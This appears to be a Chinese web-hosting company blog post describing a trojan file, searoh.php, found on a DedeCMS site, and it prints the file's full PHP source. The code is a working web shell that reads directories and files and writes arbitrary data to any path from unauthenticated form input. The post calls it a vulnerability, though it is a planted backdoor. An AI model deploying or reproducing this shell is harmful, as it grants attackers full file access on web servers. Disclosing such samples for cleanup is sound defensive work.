迷城网络 - 专注于中小企业Linux运维服务

当前位置: 迷城网络 > 建站程序 >

织梦新漏洞searoh.php可读取写入文件

时间:2019-03-27 10:50来源: 作者: 点击:
织梦新漏洞searoh.php可读取写入文件,获取网站的栏目能知道网站所有的目录。这两天在网站被百度举报,显示风险提示。于是就开始找木马文件。 经过认真的排查终于找到一个名称为

新漏洞searoh.php可读取写入文件,获取网站的栏目能知道网站所有的目录。这两天在网站被百度举报,显示风险提示。于是就开始找木马文件。

经过认真的排查终于找到一个名称为searoh.php的php文件。运行这个文件可以得到下面的结果,能获取网站的栏目,同时也可以再网站里面写入木马。实在可怕。

下面我来共享这个文件的源码。

<?

header("content-Type: text/html; charset=gb2312");

if(get_magic_quotes_gpc()) 

{

foreach($_POST as $k=>$v) 

{

$_POST[$k] = stripslashes($v);

}

}

$data="";

if(!empty($_POST['action']))

{

if ($_POST['action']=="读取")

{

if(!empty($_POST['file']))

{

if(is_dir($_POST['file']))

{

$dir=opendir($_POST['file']);

while(($file=readdir($dir))!==false)

{

$data=$data.$file."\r\n";

}

closedir($dir);

}

else if(is_file($_POST['file']))

{

$fp=@fopen($_POST['file'],'r');

$data=@fread($fp,filesize($_POST['file']));

$data=str_replace("&","&amp;",$data);

$data=str_replace('"',"&quot;",$data);

$data=str_replace("'","&#039;",$data);

$data=str_replace("<","&lt;",$data);

$data=str_replace(">","&gt;",$data);

@fclose($fp);

}

}

}

elseif ($_POST['action']=="写入")

{

if(!empty($_POST['file']) && !empty($_POST['data']))

{

$fp = @fopen($_POST['file'],'wb');

echo @fwrite($fp,$_POST['data']) ? '写入成功!' : '写入失败!';

@fclose($fp);

}

}

}

?>

<form method="POST">

绝对路径: <input type="text" name="file" size="60" value="<? echo str_replace(basename(__FILE__),"",str_replace('\\','/',__FILE__)) ?>">

<br><br>

<textarea name="data" COLS="70" ROWS="18" ><?php echo $data?></textarea>

<br><br>

<input type="submit" name="action" value="读取"> 

<input type="submit" name="action" value="写入"> 

</form>

运行这个文件的效果图:

 

 


(责任编辑:迷城网络科技)
织梦二维码生成器
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
用户名: 验证码:点击我更换图片
栏目列表
推荐内容